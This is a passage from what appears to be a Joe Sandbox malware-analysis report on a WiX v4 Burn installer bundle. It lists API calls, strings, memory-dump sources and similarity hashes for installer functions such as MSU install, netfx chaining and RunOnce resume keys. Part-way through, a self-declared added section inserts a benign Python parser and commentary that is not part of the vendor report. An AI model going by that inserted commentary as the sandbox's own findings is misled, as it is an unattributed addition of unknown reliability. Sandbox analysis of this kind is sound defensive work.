• CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,00000000,?,?,?,?), ref: 00949E04
Strings
• Failed to format MSU install command., xrefs: 00949C54
• wusa.exe, xrefs: 00949B68
• Failed to ensure WU service was enabled to install MSU package., xrefs: 00949D10
• Failed to append log switch to MSU command-line., xrefs: 00949C8E
• d:\a\wix4\wix4\src\burn\engine\msuengine.cpp, xrefs: 00949AFD, 00949BE2, 00949D59
• Failed to get action arguments for MSU package., xrefs: 00949B9B
• "%ls" "%ls" /quiet /norestart, xrefs: 00949C40
• Failed to get cached path for package: %ls, xrefs: 00949BD0
• Failed to allocate WUSA.exe path., xrefs: 00949B7B
• Failed to append SysNative directory., xrefs: 00949B31
• Failed to append log path to MSU command-line., xrefs: 00949CBA
• Failed to run MSU process, xrefs: 00949D47
• WixBundleExecutePackageCacheFolder, xrefs: 00949BFB, 00949E1E
• Failed to build MSU path., xrefs: 00949C20
• SysNative\, xrefs: 00949B21
• /log:, xrefs: 00949C7A
• Failed to determine WOW64 status., xrefs: 00949AEB
• Failed to find System32 directory., xrefs: 00949B50
Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                   • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Handle$Close$AddressCurrentErrorLastModuleProcProcess
                                                                                                                                                                  • String ID: /log:$"%ls" "%ls" /quiet /norestart$Failed to allocate WUSA.exe path.$Failed to append SysNative directory.$Failed to append log path to MSU command-line.$Failed to append log switch to MSU command-line.$Failed to build MSU path.$Failed to determine WOW64 status.$Failed to ensure WU service was enabled to install MSU package.$Failed to find System32 directory.$Failed to format MSU install command.$Failed to get action arguments for MSU package.$Failed to get cached path for package: %ls$Failed to run MSU process$SysNative\$WixBundleExecutePackageCacheFolder$d:\a\wix4\wix4\src\burn\engine\msuengine.cpp$wusa.exe
                                                                                                                                                                  • API String ID: 1400713077-1245678217
                                                                                                                                                                  • Opcode ID: fd690fcd7daa370a184ef6054466dd58a92e61318aa378e7dc3e98383e39bf2c
                                                                                                                                                                  • Instruction ID: 637a1775d26f74b366202a06db19f399ff3d60dba9b512db1f6eae7e6fae85cc
                                                                                                                                                                  • Opcode Fuzzy Hash: fd690fcd7daa370a184ef6054466dd58a92e61318aa378e7dc3e98383e39bf2c
                                                                                                                                                                  • Instruction Fuzzy Hash: 27A1A231E80219BBEF229B98CC46FEF7A79AF44715F110161FA04BA2D0D7B59D90DB90
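Added example, not part of the Joe Sandbox report: a small parser for the per-function records shown in this section (the Strings, APIs, Memory Dump Source and Similarity blocks), so that the string xrefs, API references, String/API IDs and fuzzy hashes can be loaded as data and pivoted on across reports. The sample input is constructed from the msuengine.cpp and netfxchainer.cpp records above, trimmed to a few lines each; the record layout (a record ends at its "Instruction Fuzzy Hash" line, "$" separates entries in the ID fields) is taken from this page, and nothing else about the report format is assumed.

```python
"""Parse Joe Sandbox per-function records (Strings / APIs / Memory Dump Source /
Similarity) into dicts so string xrefs, API refs and fuzzy hashes can be pivoted on."""
import re

# Constructed sample: two records from this report in the report's own layout.
SAMPLE = r"""
Strings
• Failed to format MSU install command., xrefs: 00949C54
• wusa.exe, xrefs: 00949B68
• d:\a\wix4\wix4\src\burn\engine\msuengine.cpp, xrefs: 00949AFD, 00949BE2, 00949D59
• "%ls" "%ls" /quiet /norestart, xrefs: 00949C40
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
Similarity
• API ID: Handle$Close$AddressCurrentErrorLastModuleProcProcess
• String ID: /log:$"%ls" "%ls" /quiet /norestart$wusa.exe$d:\a\wix4\wix4\src\burn\engine\msuengine.cpp
• API String ID: 1400713077-1245678217
• Opcode Fuzzy Hash: fd690fcd7daa370a184ef6054466dd58a92e61318aa378e7dc3e98383e39bf2c
• Instruction Fuzzy Hash: 27A1A231E80219BBEF229B98CC46FEF7A79AF44715F110161FA04BA2D0D7B59D90DB90
APIs
  • Part of subcall function 00975CB8: UuidCreate.RPCRT4(?), ref: 00975CDB
• CloseHandle.KERNEL32(00000000,?,?,?,00000000,08000000,00000000,00000000,?,?,?,?,?), ref: 009567B4
• CloseHandle.KERNEL32(00000000,?,?,?,00000000,08000000,00000000,00000000,?,?,?,?,?), ref: 009567CD
Strings
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
Similarity
• API ID: CloseHandle$CreateUuid
• String ID: %ls /pipe %ls$NetFxEvent.%ls$d:\a\wix4\wix4\src\burn\engine\netfxchainer.cpp
• API String ID: 264999607-3586658835
• Instruction Fuzzy Hash: A0A1AF31E40328ABDF21DBA5CD46FDE7BB8AB48715F504154F908FB291E6B49D88CB90
"""

SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# "Part of subcall function X:" prefix is optional; args never contain ')' in these records.
API_RE = re.compile(r"^(?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?"
                    r"(?P<name>\w+)\.(?P<module>\w+)\((?P<args>.*)\), ref: (?P<ref>[0-9A-F]{8})$")
XREF_RE = re.compile(r"^(?P<text>.*), xrefs: (?P<addrs>[0-9A-F]{8}(?:, [0-9A-F]{8})*)$")
SOURCE_RE = re.compile(r"^Source File: (?P<file>\S+), Offset: (?P<offset>[0-9A-F]{8})")
# Source paths embedded in the engine; these tag the module as the WiX v4 Burn bootstrapper.
WIX_SRC = re.compile(r"^d:\\a\\wix4\\wix4\\src\\burn\\engine\\(\w+\.cpp)$", re.IGNORECASE)


def _new_record():
    return {"apis": [], "strings": {}, "source_file": None, "offset": None, "similarity": {}}


def parse_records(text):
    """Return one dict per function record, in report order."""
    records, rec, section = [], _new_record(), None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTION_HEADERS:
            section = line
            continue
        body = line.lstrip("• ").strip()          # drop the report's bullet
        if section == "APIs":
            m = API_RE.match(body)
            if m:
                rec["apis"].append({"api": f"{m['name']}.{m['module']}", "ref": m["ref"],
                                    "args": m["args"].split(","), "subcall_of": m["sub"]})
        elif section == "Strings":
            m = XREF_RE.match(body)
            if m:
                rec["strings"][m["text"]] = m["addrs"].split(", ")
        elif section == "Memory Dump Source":
            m = SOURCE_RE.match(body)
            if m:
                rec["source_file"], rec["offset"] = m["file"], m["offset"]
        elif section == "Similarity":
            key, _, val = body.partition(":")      # values such as "/log:" keep their own colons
            key, val = key.strip(), val.strip()
            if key in ("API ID", "String ID"):
                rec["similarity"][key] = [s for s in val.split("$") if s]
            elif key == "API String ID":
                api_hash, _, str_hash = val.partition("-")
                rec["similarity"][key] = (int(api_hash), int(str_hash))
            else:
                rec["similarity"][key] = val
            if key == "Instruction Fuzzy Hash":   # last field of every record on the page
                records.append(rec)
                rec, section = _new_record(), None
    return records


def burn_engine_sources(records):
    """Sorted WiX Burn engine source files named in the String IDs."""
    found = set()
    for rec in records:
        for s in rec["similarity"].get("String ID", []):
            m = WIX_SRC.match(s)
            if m:
                found.add(m.group(1).lower())
    return sorted(found)


def pivot_keys(records):
    """(API String ID, Instruction Fuzzy Hash) pairs to search other reports for."""
    return [(r["similarity"].get("API String ID"), r["similarity"].get("Instruction Fuzzy Hash"))
            for r in records]


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    print(len(recs), "records;", "engine sources:", burn_engine_sources(recs))
    for key in pivot_keys(recs):
        print(key)
```

The "Instruction Fuzzy Hash" and "API String ID" are the fields worth pivoting on, since they survive rebuilds better than the exact Opcode/Instruction IDs. The `$` separator means a string that itself contains `$` would be split in two; none of the strings on this page do. The WiX source paths the parser picks out (`msuengine.cpp`, `netfxchainer.cpp`, and on this page also `bundlepackageengine.cpp`, `condition.cpp`, `registration.cpp`, `apply.cpp`) belong to the WiX v4 Burn bootstrapper engine, so the functions in these records are installer plumbing; the behaviour listed under Signatures has to be looked for in what the bundle installs, not in these functions.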
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00975CB8: UuidCreate.RPCRT4(?), ref: 00975CDB
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,00000000,08000000,00000000,00000000,?,?,?,?,?), ref: 009567B4
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,00000000,08000000,00000000,00000000,?,?,?,?,?), ref: 009567CD
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                   • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseHandle$CreateUuid
                                                                                                                                                                  • String ID: %ls$%ls /pipe %ls$Failed to CreateProcess on path: %ls$Failed to allocate event name.$Failed to allocate section name.$Failed to append netfx chainer args.$Failed to append user args.$Failed to create netfx chainer guid.$Failed to create netfx chainer.$Failed to get netfx return code.$Failed to process netfx chainer message.$Failed to wait for netfx chainer process to complete$NetFxEvent.%ls$NetFxSection.%ls$d:\a\wix4\wix4\src\burn\engine\netfxchainer.cpp
                                                                                                                                                                  • API String ID: 264999607-3586658835
                                                                                                                                                                  • Opcode ID: 7b97017810f6c757a464a061821c74d9d8a698193ef36dd7e9beb59912e8daed
                                                                                                                                                                  • Instruction ID: f323b3ee1973d67d21535123cb1402d56158356163c86a64973db14caad757c7
                                                                                                                                                                  • Opcode Fuzzy Hash: 7b97017810f6c757a464a061821c74d9d8a698193ef36dd7e9beb59912e8daed
                                                                                                                                                                  • Instruction Fuzzy Hash: A0A1AF31E40328ABDF21DBA5CD46FDE7BB8AB48715F504154F908FB291E6B49D88CB90
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                   • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: Action$Addon$Detect$Failed to get @Action.$Failed to get @Id.$Failed to get RelatedBundle element count.$Failed to get RelatedBundle nodes$Failed to get next RelatedBundle element.$Failed to resize Addon code array$Failed to resize Detect code array$Failed to resize Patch code array$Failed to resize Upgrade code array$Invalid value for @Action: %ls$Patch$RelatedBundle$Upgrade$d:\a\wix4\wix4\src\burn\engine\bundlepackageengine.cpp
                                                                                                                                                                  • API String ID: 0-738192170
                                                                                                                                                                  • Opcode ID: 5d2bba6d974fabe8a7a9bc837da6d604a67586955ab9a5fdbdcfe7511ec77b07
                                                                                                                                                                  • Instruction ID: cf95f0380ce781203eb4c0ef9802c62d349e952eb666d95815f5009cf6f71a43
                                                                                                                                                                  • Opcode Fuzzy Hash: 5d2bba6d974fabe8a7a9bc837da6d604a67586955ab9a5fdbdcfe7511ec77b07
                                                                                                                                                                  • Instruction Fuzzy Hash: 1491BF31B84209BBDF11DF84CC46FAE7B76ABC9B28F214154F6157B2D0EAB09981DB10
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetStringTypeW.KERNEL32(00000001,?,00000001,?,00000018,?,00000000,00000000), ref: 0091C9C4
                                                                                                                                                                  • GetStringTypeW.KERNEL32(00000001,?,00000001,00000048), ref: 0091CBEA
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                   • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: StringType
                                                                                                                                                                  • String ID: -$AND$Failed to parse condition "%ls". Constant too big, at position %d.$Failed to parse condition "%ls". Identifier cannot start at a digit, at position %d.$Failed to parse condition "%ls". Invalid version format, at position %d.$Failed to parse condition "%ls". Unexpected '~' operator at position %d.$Failed to parse condition "%ls". Unexpected character at position %d.$Failed to parse condition "%ls". Unterminated literal at position %d.$Failed to set symbol value.$H$NOT$Symbol was too long: %ls$d:\a\wix4\wix4\src\burn\engine\condition.cpp
                                                                                                                                                                  • API String ID: 4177115715-673032140
                                                                                                                                                                  • Opcode ID: d0811ce3f057cb031d42c2a34059878f10cb9e0b657bfbf4aef818e219a2fb15
                                                                                                                                                                  • Instruction ID: 7a72cf7f0034770c3590763fe8c7202c9889903b68e961ef2e6e4e567ca6a9d2
                                                                                                                                                                  • Opcode Fuzzy Hash: d0811ce3f057cb031d42c2a34059878f10cb9e0b657bfbf4aef818e219a2fb15
                                                                                                                                                                  • Instruction Fuzzy Hash: 6F02E0B1780309BADB258F54CC8AFFA7A69FB04B04F108946F9159E2C1D3B5DAD1D790
                                                                                                                                                                  APIs
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce,00020006,00000000), ref: 00927CDA
                                                                                                                                                                    • Part of subcall function 0096D789: RegSetValueExW.ADVAPI32(?,00927A20,00916CF2,EstimatedSize,000000FF,00916CF2,00000000,?,00929AF0,00000000,00000390,000000F8,00916CF2,009331C1,00000000,00000000), ref: 0096D7AD
                                                                                                                                                                  • RegDeleteValueW.ADVAPI32(00000000,?,?,SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce,00020006,00000000), ref: 00927C1F
                                                                                                                                                                  • RegDeleteValueW.ADVAPI32(009331C1,BundleResumeCommandLine,?,SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce,00020006,00000000), ref: 00927C6F
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                   • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Value$Delete$Close
                                                                                                                                                                  • String ID: "%ls" /%ls /%ls$BundleResumeCommandLine$Failed to create run key.$Failed to delete resume command line value.$Failed to delete run key value.$Failed to format resume command line for RunOnce.$Failed to open run key.$Failed to write Installed value.$Failed to write Resume value.$Failed to write resume command line value.$Failed to write run key value.$Installed$Resume$SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce$burn.clean.room$burn.runonce$d:\a\wix4\wix4\src\burn\engine\registration.cpp
                                                                                                                                                                  • API String ID: 1871269255-1559682262
                                                                                                                                                                  • Opcode ID: a157caee108aac3c0e4acb9a0909fdf94c2473021dabd8b5196a6cf954ed8b96
                                                                                                                                                                  • Instruction ID: 9d885391b2e13cfd16ddae23107a582475ec5e93e573858d4e68fa0398463272
                                                                                                                                                                  • Opcode Fuzzy Hash: a157caee108aac3c0e4acb9a0909fdf94c2473021dabd8b5196a6cf954ed8b96
                                                                                                                                                                  • Instruction Fuzzy Hash: DF516B32B89735B7EB21AAE0EC4BFBFE918AF40B15F110014BE01763D0E6A49D4097E5
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetExitCodeThread.KERNEL32(?,00000160,00000001,00916CF2,00000000,000000FF,00916DA2,00000000,000000B0,00916CF2,00916CF2,009330D0,00000160,?,00916DA2), ref: 009505A1
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 009505AF
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to execute EXE package., xrefs: 00950684
                                                                                                                                                                  • Failed to execute BUNDLE package., xrefs: 0095064C
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\apply.cpp, xrefs: 009505D3, 009505D9, 009505ED, 00950850, 0095085B, 00950878, 009508C4
                                                                                                                                                                  • Failed to execute MSI package., xrefs: 009506BD
                                                                                                                                                                  • Failed to execute commit MSI transaction action., xrefs: 009507EF
                                                                                                                                                                  • Failed to execute begin MSI transaction action., xrefs: 009507C2
                                                                                                                                                                  • Failed to execute MSU package., xrefs: 00950737
                                                                                                                                                                  • Cache thread exited unexpectedly with exit code: %u., xrefs: 00950866
                                                                                                                                                                  • Invalid execute action., xrefs: 009508AB
                                                                                                                                                                  • Failed to execute related bundle., xrefs: 00950614
                                                                                                                                                                  • Failed to wait for cache check-point., xrefs: 00950883
                                                                                                                                                                  • Failed to get cache thread exit code., xrefs: 009505DF
                                                                                                                                                                  • Failed to execute package provider registration action., xrefs: 00950764
                                                                                                                                                                  • Failed to execute MSP package., xrefs: 009506F6
                                                                                                                                                                  • Failed to execute uninstall MSI compatible package., xrefs: 00950897
                                                                                                                                                                  • Failed to execute dependency action., xrefs: 00950791
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CodeErrorExitLastThread
                                                                                                                                                                  • String ID: Cache thread exited unexpectedly with exit code: %u.$Failed to execute BUNDLE package.$Failed to execute EXE package.$Failed to execute MSI package.$Failed to execute MSP package.$Failed to execute MSU package.$Failed to execute begin MSI transaction action.$Failed to execute commit MSI transaction action.$Failed to execute dependency action.$Failed to execute package provider registration action.$Failed to execute related bundle.$Failed to execute uninstall MSI compatible package.$Failed to get cache thread exit code.$Failed to wait for cache check-point.$Invalid execute action.$d:\a\wix4\wix4\src\burn\engine\apply.cpp
                                                                                                                                                                  • API String ID: 1352145401-3642936599
                                                                                                                                                                  • Opcode ID: f6e2bbd9cc8ca45d393df54ccb314664a6ef9583edbcfb5edb0afd3984f1c2ef
                                                                                                                                                                  • Instruction ID: 1ac1a5a067e9d88c99e6b8f576ceb5499a32bc32114d2c429b7cb2c66e97af51
                                                                                                                                                                  • Opcode Fuzzy Hash: f6e2bbd9cc8ca45d393df54ccb314664a6ef9583edbcfb5edb0afd3984f1c2ef
                                                                                                                                                                  • Instruction Fuzzy Hash: C2B18531A4121ABBEF11CE56CC46FAF7B78EB85B55F110065BE04BA2D1E2B19D44CBE0
                                                                                                                                                                  APIs
                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0097943E
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to process all ATOM category elements., xrefs: 009793F3
                                                                                                                                                                  • scheme, xrefs: 00979275
                                                                                                                                                                  • Failed to allocate ATOM category scheme., xrefs: 009792A0
                                                                                                                                                                  • label, xrefs: 00979233
                                                                                                                                                                  • Failed get attributes on ATOM unknown element., xrefs: 009791F7
                                                                                                                                                                  • Failed to parse unknown ATOM category element: %ls, xrefs: 00979414
                                                                                                                                                                  • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\atomutil.cpp, xrefs: 00979206, 00979402, 00979423
                                                                                                                                                                  • Failed to get child nodes of ATOM category element., xrefs: 00979372
                                                                                                                                                                  • term, xrefs: 009792B6
                                                                                                                                                                  • Failed to allocate ATOM category label., xrefs: 0097925F
                                                                                                                                                                  • Failed to allocate ATOM category term., xrefs: 00979341
                                                                                                                                                                  • Failed to process all ATOM category attributes., xrefs: 0097932D
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FreeString
                                                                                                                                                                  • String ID: Failed get attributes on ATOM unknown element.$Failed to allocate ATOM category label.$Failed to allocate ATOM category scheme.$Failed to allocate ATOM category term.$Failed to get child nodes of ATOM category element.$Failed to parse unknown ATOM category element: %ls$Failed to process all ATOM category attributes.$Failed to process all ATOM category elements.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\atomutil.cpp$label$scheme$term
                                                                                                                                                                  • API String ID: 3341692771-530868315
                                                                                                                                                                  • Opcode ID: 46e6e02da022112901a25e341c695f4df513eef55c104f98bcbb3a66185d0c31
                                                                                                                                                                  • Instruction ID: 072c0e2bb9b84a4eba48f941be7e7e3b2afc592989b454e91c8de38c1ca34aff
                                                                                                                                                                  • Opcode Fuzzy Hash: 46e6e02da022112901a25e341c695f4df513eef55c104f98bcbb3a66185d0c31
                                                                                                                                                                  • Instruction Fuzzy Hash: 7E81F432A44218FBDF019B94CC4AFAE7779EBC4B24F208195F619B72E1DB709A41DB50
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: "%ls" /%ls /uninstall /quiet$Comments$Contact$Failed to delete %ls value.$Failed to write %ls value.$HelpLink$HelpTelephone$NoModify$NoRemove$ParentDisplayName$ParentKeyName$QuietUninstallString$SystemComponent$URLInfoAbout$URLUpdateInfo$burn.clean.room$d:\a\wix4\wix4\src\burn\engine\registration.cpp
                                                                                                                                                                  • API String ID: 0-3056233166
                                                                                                                                                                  • Opcode ID: 5f7e00be9e09abbbb20f0dab1f122d8d796322397236977f344bf3b720ae9917
                                                                                                                                                                  • Instruction ID: a3029dcb02c2beebf5ee4b3639aab55b405bc7d63668d300e80a30e51322545a
                                                                                                                                                                  • Opcode Fuzzy Hash: 5f7e00be9e09abbbb20f0dab1f122d8d796322397236977f344bf3b720ae9917
                                                                                                                                                                  • Instruction Fuzzy Hash: 2F61B131FC5375B2DB3269569C4EFAB6DA89B86F14F250060BE047F3D99AA0DD40C7A0
                                                                                                                                                                  APIs
                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 009796EC
                                                                                                                                                                  Strings
                                                                                                                                                                  • url, xrefs: 0097953E
                                                                                                                                                                  • crypt32.dll, xrefs: 00979627
                                                                                                                                                                  • Failed to parse unknown ATOM content element: %ls, xrefs: 00979695
                                                                                                                                                                  • Failed to allocate ATOM content value., xrefs: 009796C6
                                                                                                                                                                  • type, xrefs: 00979500
                                                                                                                                                                  • Failed to allocate ATOM content scheme., xrefs: 009795C9
                                                                                                                                                                  • Failed get attributes on ATOM unknown element., xrefs: 009794C4
                                                                                                                                                                  • Failed to process all ATOM content elements., xrefs: 00979681
                                                                                                                                                                  • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\atomutil.cpp, xrefs: 009794D3, 009796A4, 009796D5
                                                                                                                                                                  • Failed to get child nodes of ATOM content element., xrefs: 009795FA
                                                                                                                                                                  • Failed to process all ATOM content attributes., xrefs: 009795B5
                                                                                                                                                                  • Failed to allocate ATOM content type., xrefs: 00979528
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FreeString
                                                                                                                                                                  • String ID: Failed get attributes on ATOM unknown element.$Failed to allocate ATOM content scheme.$Failed to allocate ATOM content type.$Failed to allocate ATOM content value.$Failed to get child nodes of ATOM content element.$Failed to parse unknown ATOM content element: %ls$Failed to process all ATOM content attributes.$Failed to process all ATOM content elements.$crypt32.dll$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\atomutil.cpp$type$url
                                                                                                                                                                  • API String ID: 3341692771-2309346703
